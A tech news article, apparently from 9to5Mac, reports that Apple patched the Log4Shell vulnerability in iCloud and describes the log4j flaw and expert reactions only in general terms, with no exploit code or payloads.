Apple has patched the Log4Shell iCloud vulnerability, after it was last week revealed that a security hole in the open-source tool log4j put millions of apps at risk.

Cybersecurity experts described the vulnerability as “setting the internet on fire,” and “the most critical security vulnerability in a decade” …

Background

Log4j is an open-source logging tool very widely used by both websites and apps. A security hole discovered in this could be exploited in literally millions of apps.

A new exploit called “Log4Shell” has been giving security teams at large technology companies a headache. When exploited, the vulnerability lets hackers run malicious code on vulnerable servers, and it can reportedly affect platforms such as iCloud and Steam.

As detailed by security company LunaSec (via the Verge), the vulnerability was first found in log4j, an open-source library used by multiple apps and websites for logging – which is the process of keeping a list of performed activities in order to review them later for fixing bugs or other errors.

According to security researcher Marcus Hutchins, Log4Shell could affect millions of apps around the world as the log4j library is widely used by developers.

Adding to the danger posed by widespread use of Log4j, it’s extremely easy for an attacker to use the Log4Shell exploit.

To exploit the vulnerability, an attacker has to cause the application to save a special string of characters in the log. Since applications routinely log a wide range of events — such as messages sent and received by users, or the details of system errors — the vulnerability is unusually easy to exploit and can be triggered in a variety of ways.

Apple patches Log4Shell iCloud vulnerability

iCloud was one of the services vulnerable to the exploit, and Macworld notes that Apple, Microsoft, and others have been quick to patch it.

According to the Eclectic Light Company, Apple has patched the iCloud hole. The site reports that researchers were able to demonstrate the vulnerability when connecting to iCloud through the web on December 9 and December 10, the same vulnerability no longer worked on December 11. The exploit doesn’t appear to have affected macOS.

The vulnerability was exploited in Minecraft before Microsoft patched it over the weekend […]

Crowdstrike’s Adam Meyers said the vulnerability has been “fully weaponized” and tools were readily available to exploit it. “The internet’s on fire right now,” he added shortly after the exploit was made public.

The Apache Software Foundation, which runs the project, rated it a 10 on its risk scale due to the ease of which it could be exploited and the widespread nature of the tool […] CEO of cybersecurity firm Tenable Amit Yoran called it “the single biggest, most critical vulnerability of the last decade.”

FTC: We use income earning auto affiliate links. More.


Check out 9to5Mac on YouTube for more Apple news:

You’re reading 9to5Mac — experts who break news about Apple and its surrounding ecosystem, day after day. Be sure to check out our homepage for all the latest news, and follow 9to5Mac on Twitter, Facebook, and LinkedIn to stay in the loop. Don’t know where to start? Check out our exclusive stories, reviews, how-tos, and subscribe to our YouTube channel

About the Author

Ben Lovejoy

Ben Lovejoy is a British technology writer and EU Editor for 9to5Mac. He’s known for his op-eds and diary pieces, exploring his experience of Apple products over time, for a more rounded review. He also writes fiction, with two technothriller novels, a couple of SF shorts and a rom-com!

Ben Lovejoy's favorite gear